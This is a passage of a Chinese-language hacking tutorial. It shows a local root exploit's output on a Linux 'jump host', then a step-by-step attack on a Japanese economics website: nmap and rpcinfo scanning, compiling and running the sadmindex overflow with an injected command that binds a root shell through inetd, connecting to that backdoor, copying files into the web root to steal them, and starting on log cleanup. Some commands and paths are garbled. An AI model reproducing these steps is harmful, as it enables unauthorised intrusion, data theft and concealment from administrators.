Checking for /usr/bin/msgfmt...Ok
Checking for /usr/bin/objdump...Ok
Checking write permisions on /tmp...Ok
Checking read permisions on /bin/su...Ok
Checking for a valid language... [using cs_CZ] Ok
Checking that /tmp/LC_MESSAGES does not exist...Ok
Phase 2. Calculating eat and pad values
.....................................................................done
eat = 119 and pad = 2
Phase 3. Creating evil libc.mo and setting enviroment
vars
Phase 4. Getting address of .dtors section of /bin/su
..........................................done
.dtors is at 0x0804ba0c
Phase 5. Compiling suid shell
/tmp/xp created Ok
Phase 6. Executing /bin/su
- Entering rootshell ;-) -
bash#
ok,到这里我们已得到root了。您现在能够****想干的事情了!!!
bash#telnet localhost
这样就会将下一个登陆人的IP覆盖到自己IP上:)这样就不容易发现了!!!
一个跳板Linux主机就作好了,记得保存好哟,我们下次还要用呢!!!
二.攻击篇
这些天我看准了日本一家经济方面的网站,想进去拿点东西;)假如发E-mail给网管叫他给我,我想他一定不答应。说不定用那乱七八糟的日文将我骂一顿,可对于我这个不懂日文的家伙可能看了还乐滋滋的,并不觉得是在骂我。那么,就只有一中方法了,那就是我自己进去看看J(下面网站地址用196.0.0.1表示,以便将跳板主机和我们要攻击的主机分开)
首先,我们登陆上次已Crack了的Linux主机吧:)我想刚刚Crack完应该更有效吧;)
c:\>telnet xxx.xxx.xxx.xxx
Login:test
Password:
##########################################################################
# However,as the Serv will reload those classes. #
# inside the “/usr/proj/gipex/class”.you just. #
# need to remove the old class with the new one. #
# #########################################################################
$./su
bash#nmap –O 196.0.0.1
我们通过nmap的扫描结果发现这个系统是SunOS 5.6的主机
我马上又登陆到另一台已Crack了的SunOS5.6的主机(至于SunOS5.6跳板主机如何得到我就不再在这里浪费口舌了,和Linux跳板主机的制作方法大同小异)
#rpccinfo –p 196.0.0.1
program vers proto port service
100000 4 tcp 111 rpcbind
100000 3 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100000 2 udp 111 rpcbind
…………
100232 10 udp 61358 sadmind
…………
100001 4 udp 61363 rstatd
100001 3 udp 61363 rstatd
根据rpcinfo返回的结果,我发现这台主机开放了不少RPC服务,其中:
100232 10 udp 61358 sadmind
引起我的注意,我记得在CERT的报告有一个关于sadmind的远程溢出报告,那一定也有相应的溢出程式:)我马上到www.hack.co.za搜索一番:)最后我找到了一个溢出源程式sadmindex.c(程式太长,我就不在这里罗列了!!!请大家到www.hack.co.za上找:)
我们登陆到那台Linux上
bash#gcc –o sadmindex sadmindex.c –lrpcsvc –lnsl –lsocket
bash#./sadmindex –h 196.0.0.1 –c “echo ‘ingreslock stream tcp nowait root /bin/sh **-*’>> /*mp/bob;/usr/sbin/inetd –s /tmp/bob”-s 0xefff9580
“echo ‘ingreslock stream tcp nowait root /bin/sh **-*’>> /*mp/bob这一句是我们要在目标服务器上执行的命令,他的功能就是生成一个内容是”ingreslock stream tcp nowait root /bin/sh **-*”的/*mp/bob文档,然后再用inetd来启动,假如成功我们就能够再目标机的1024端口上开一个后门,用TELNET连接上去后就能够直接用root身份执行shell了。。。哈哈是不是很爽?
Bash#telnet 196.0.0.1 1024
#
ok成功J我们成功得到root了!!!
#find / -name index.html –print
在/www/http/htdoc/目录下发现主页文档:)我的目的不是改主页,是要一些文档:)在这只是带说一下查找的方法!
#find / -name *.* -print (*.*是我要找的文档。这里省略名字:))
接下来将文档copy到主页目录,这样我们就能够下载了:)
#cp /home/www/*.* /www/http/htdoc
ok完成。我马上在浏览器里打入:http://196.0.0.1/*.*
下载成功。。。这次攻击就结束了。。。嘿嘿。。。。下面应该是要擦屁股走人了。。。但是假如您不想也能够。因为我们已通过跳板登陆的。他们要查到我们也不是很容易的:)但是为了更加保险。也为了我们能够下次在登陆。我们还是擦擦屁股比较好。。。哦。。。天啊!!!
呀。。。不好。。。妈妈来了。。。叫俺学习去:(没办法。。。我们下次接着说吧!!!
三.打扫战场
我们进行一次攻击为了不让管理员发现,同时也为了我们有可能再一次的登陆,我们有必要清理等了记录。为了找出怎么做的合适方法,我们不妨看看/etc/syslog.conf配置文档的内容。也许对您清理战场有很大帮助!
#cat /etc/syslog.conf
#Log all kernel messages to the console.
#Loging much else clutters up the screen.
#kern.*
#Log anything (except mail)of level info or higher.
#Don’t log private authentication messages!
*.info;mail.none;authpriv.none
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
